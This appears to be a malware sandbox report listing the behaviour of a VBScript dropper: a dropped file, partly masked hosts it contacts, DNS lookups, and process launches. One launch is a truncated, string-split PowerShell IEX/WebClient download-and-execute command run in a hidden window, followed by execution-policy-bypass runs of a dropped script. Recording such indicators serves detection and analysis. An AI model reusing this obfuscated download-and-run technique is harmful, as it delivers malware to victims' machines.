Technical Information
- C:\users\public\ss.vbs
- 'ia#####3.us.archive.org':443
- 'la####.hawkhost.com':443
- 'fi###.alifares.org':80
- 'ia#####3.us.archive.org':443
- 'la####.hawkhost.com':443
- DNS ASK ia#####3.us.archive.org
- DNS ASK la####.hawkhost.com
- DNS ASK fi###.alifares.org
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\ss.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1